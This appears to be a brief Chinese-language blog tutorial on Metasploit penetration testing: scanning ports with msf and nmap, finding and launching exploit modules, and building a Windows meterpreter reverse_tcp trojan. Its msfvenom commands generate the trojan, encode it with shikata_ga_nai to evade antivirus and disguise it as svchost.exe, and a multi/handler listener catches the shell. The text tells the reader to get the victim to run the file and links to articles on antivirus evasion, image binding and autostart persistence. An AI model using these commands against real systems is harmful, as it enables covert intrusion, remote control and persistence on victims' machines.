LINUX(四)渗透测试metasploit

mac2025-12-11  2

攻击方式 利用漏洞 利用后门 一 利用漏洞 1 扫描端口 (一)使用msf扫描 (1)查看可用端口

search portscan

(2)使用扫描模块

use *****

(3)查看配置选项,配置扫描模块

show options set LPOST ***

(4)运行扫描模块

run

(二)使用nmap 扫描

nmap -O -Pn/-p0 IP nmap -sV IP

2 搜索漏洞

search 服务名(version)

3 使用漏洞模块

use ***

4 配置漏洞模块

show options set HOST IP

5 发起进攻

exploit

二 利用木马 1 生成木马(固定写法)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.5 lport=6666 -f exe > hack.exe

捆绑svchost.exe应用程序

msfvenom -p windows/meterpreter/reverse_tcp --platform LHOST=192.168.1.4 LPORT=5555 -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe -f exe > /root/Desktop/shellcode.exe -p 选择payload -e 选择编码器 -i 编码次数 -f 编译后的格式 -x 捆绑程序 -a 系统位数 x64 x86 x86_64

想办法让靶机执行木马 2 服务器启动接受木马请求 打开数据库服务

service postgresql start

启动metasploit

msfconsole

选择攻击模块

use exploit/multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

查看设置选项,配置HOST PORT

show options

启动服务

run

免杀 https://blog.csdn.net/weixin_40602516/article/details/81144189 https://blog.csdn.net/zsc201825/article/details/80918185 https://blog.csdn.net/weixin_39997829/article/details/80001681

图片捆绑 https://blog.csdn.net/xiaoi123/article/details/78915374

自己自启 https://www.cnblogs.com/findumars/p/6435434.html

使用mingw32 自研 apt-get install mingw-w64

修改FakeImageExploiter.sh文件,替换成i686-w64-mingw32-gcc

最新回复(0)